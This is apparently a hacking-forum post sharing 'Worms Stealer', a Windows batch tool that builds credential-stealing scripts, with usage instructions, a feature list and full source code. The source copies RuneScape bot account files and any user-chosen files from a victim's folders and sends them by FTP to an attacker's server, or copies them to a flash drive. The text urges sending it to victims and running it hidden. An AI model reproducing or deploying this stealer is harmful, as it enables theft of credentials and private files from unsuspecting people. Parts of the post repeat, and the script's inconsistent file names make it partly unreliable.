Worms Stealer
Features:
V2 Spotlight:
How to use it:
Make the server, send to your victim, win.
The CMD window that it opens is NOT hidden, so you can run as hidden on your rat victims, or compile it and set it to run as hidden.
The Custom file stealer will work with directories variable. They are:
Format: Variable - (Example, Description)
%appdata% - (\appdata\roaming, the roaming folder)
%homedrive% - (C:\ default drive, like C
%homepath% - (\Users\Worms, the user folder)
%systemroot% - (C:\windows, where the windows folder is)
%username% - (Worms, the username)
%tmp% -(AppData\Local\Temp, the temporary folder)
So, lets say you wanna steal the serial.txt from xyz folder that is located on the user documents.
Pretty simple eh?
If you don't know if it's right, open your CMD, type: echo %variable you wanna check%
Like:
Prompted me C:\Windows
It's easy to use, once you got it you should be able to steal anything.
Give me some feedback, I've put a lot of effort in this. If i see this code leeched i will get you banned IRL. If you find this code in ANY other site, please report it to me, i will contact the admins of the respective site.
Source Code:
Features:
- Steal ANY File
- Powerbot, RSBuddy GUARANTEED Account.ini steal
- Nexus Stealer (If it finds the directory)
- FUD
- 1~10 Kb server
- Offline stealer - Put it on a flash drive, run on someone's PC and it will paste all the files in it
V2 Spotlight:
- Will steal full folders (Sending them as .rar)
- File Pumper
- I will try to make the ftp password encrypted on the server
- You will be able to copy and delete the file on the original foler.
How to use it:
Make the server, send to your victim, win.
The CMD window that it opens is NOT hidden, so you can run as hidden on your rat victims, or compile it and set it to run as hidden.
The Custom file stealer will work with directories variable. They are:
Format: Variable - (Example, Description)
%appdata% - (\appdata\roaming, the roaming folder)
%homedrive% - (C:\ default drive, like C
%homepath% - (\Users\Worms, the user folder)
%systemroot% - (C:\windows, where the windows folder is)
%username% - (Worms, the username)
%tmp% -(AppData\Local\Temp, the temporary folder)
So, lets say you wanna steal the serial.txt from xyz folder that is located on the user documents.
Code:
%homepath%\documents\xyz\serial.txt
If you don't know if it's right, open your CMD, type: echo %variable you wanna check%
Like:
Code:
echo %systemroot%
It's easy to use, once you got it you should be able to steal anything.
Give me some feedback, I've put a lot of effort in this. If i see this code leeched i will get you banned IRL. If you find this code in ANY other site, please report it to me, i will contact the admins of the respective site.
Source Code:
Code:
:Made by Worms
@echo off
title Worms Stealer
color 0e
set cudir=%cd%
:start
cls
echo.
echo _ _ _____ _ _
echo ^| ^| ^| ^| / ___^| ^| ^| ^|
echo ^| ^| ^| ^| ___ _ __ _ __ ___ ___ \ `--.^| ^|_ ___ __ _^| ^| ___ _ __
echo ^| ^|/\^| ^|/ _ \^| '__^| '_ ` _ \/ __^| `--. \ __^|/ _ \/ _` ^| ^|/ _ \ '__^|
echo \ /\ / (_) ^| ^| ^| ^| ^| ^| ^| \__ \ /\__/ / ^|_^| __/ (_^| ^| ^| __/ ^|
echo \/ \/ \___/^|_^| ^|_^| ^|_^| ^|_^|___/ \____/ \__^|\___^|\__,_^|_^|\___^|_^|
echo.
echo.
echo Select one option:
echo.
echo 1 - Make Online Stealer
echo 2 - Make Offline Stealer
echo.
set /p option=Number:
if %option% == 1 goto online
if %option% == 2 goto offline
goto start
:online
cls
echo.
echo Online Setup
echo.
set /p host=FTP Host to connect:
set /p usrnm=FTP Username:
set /p pwrd=FTP Password:
echo @echo off > onlin.bat
echo echo user %usrnm%^>^> ftpcmd.dat>> online.bat
echo echo %pwrd%^>^> ftpcmd.dat>> online.bat
echo echo cd public_html^>^> ftpcmd.dat >> online.bat
:onstart
cls
echo.
echo Set files to Steal
echo.
echo 1 - Powerbot Accounts INI %pbadd%
echo 2 - RSBuddy Accounts INI %rsbadd%
echo 3 - Nexus data.db %nxadd%
echo 4 - Custom File
echo 5 - Finish Online Setup
set /p onfile=
if %onfile% == 1 goto powerboton
if %onfile% == 2 goto rsbuddyon
if %onfile% == 3 goto nexuson
if %onfile% == 4 goto customon
if %onfile% == 5 goto finishon
goto onstart
:powerboton
echo copy %%appdata%%\rsbot* rsbot_%%username%%.ini >> onlin.bat
echo echo send rsbot*.ini^>^> ftpcmd.dat >> online.bat
echo del rsbot*.ini >> onliner.bat
set pbadd=(Added)
goto onstart
:rsbuddyon
echo copy %%appdata%%\rsbuddy* rsbuddy_%%username%%.ini >> onlin.bat
echo echo send rsbuddy*.ini^>^> ftpcmd.dat >> online.bat
echo del rsbuddy*.ini >> onliner.bat
set rsbadd=(Added)
goto onstart
:nexuson
echo copy c:\botclient\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\botclientnet\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\desktop\botclientnet\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\downloads\botclientnet\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\documents\botclientnet\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\botclient\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\desktop\botclient\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\downloads\botclient\config\data.db data_%%username%%.db >> onlin.bat
echo copy c:\users\%%username%%\documents\botclient\config\data.db data_%%username%%.db >> onlin.bat
echo cls >> onlin.bat
echo echo send data*.db^>^> ftpcmd.dat >> online.bat
echo del data*.db >> onliner.bat
set nxadd=(Added)
goto onstart
:customon
cls
echo.
echo Remember to read the manual to learn how to use directory and name variables!
echo.
set /p onlocation=File Location:
set /p onameftp=Name on FTP:
echo copy %onlocation% %onameftp% >> onlin.bat
echo echo send %onameftp%^>^> ftpcmd.dat >> online.bat
echo del %onameftp% >> onliner.bat
goto onstart
:finishon
set pbadd=
set rsbadd=
set nxadd=
echo echo disconnect^>^> ftpcmd.dat >> online.bat
echo echo bye^>^> ftpcmd.dat >> online.bat
echo ftp -v -n -i -s:ftpcmd.dat %host% >> online.bat
echo del ftpcmd.dat >> online.bat
copy onlin*.bat Stealer.bat
del onli*
goto start
:offline
cls
echo.
echo Set files to Steal
echo.
echo 1 - Powerbot Accounts INI %pbadded%
echo 2 - RSBuddy Accounts INI %rsbadded%
echo 3 - Nexus data.db %ndbadded%
echo 4 - Custom File
echo 5 - Go Back To Menu
set /p offfile=
if %offfile% == 1 goto powerbot
if %offfile% == 2 goto rsbuddy
if %offfile% == 3 goto nexus
if %offfile% == 4 goto custom
if %offfile% == 5 goto btmenu
goto offline
:powerbot
echo copy %%appdata%%\rsbot*.ini rsbot_%%username%%.ini >> offline.bat
set pbadded=(Added)
goto offline
:rsbuddy
echo copy %%appdata%%\rsbuddy*.ini rsbuddy_%%username%%.ini >> offline.bat
set rsbadded=(Added)
goto offline
:nexus
echo copy c:\botclient\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\botclientnet\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\desktop\botclientnet\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\downloads\botclientnet\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\documents\botclientnet\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\botclient\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\desktop\botclient\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\downloads\botclient\config\data.db data_%%username%%.db >> offline.bat
echo copy c:\users\%%username%%\documents\botclient\config\data.db data_%%username%%.db >> offline.bat
set ndbadded=(Added)
goto offline
:custom
cls
echo.
echo Remember to read the manual to learn how to use directory and name variables!
echo.
set /p location=File Location:
set /p namefile=Name on Folder:
echo copy %location% %namefile% >> offline.bat
goto offline
:btmenu
set ndbadded=
set rsbadded=
set pbadded=
goto start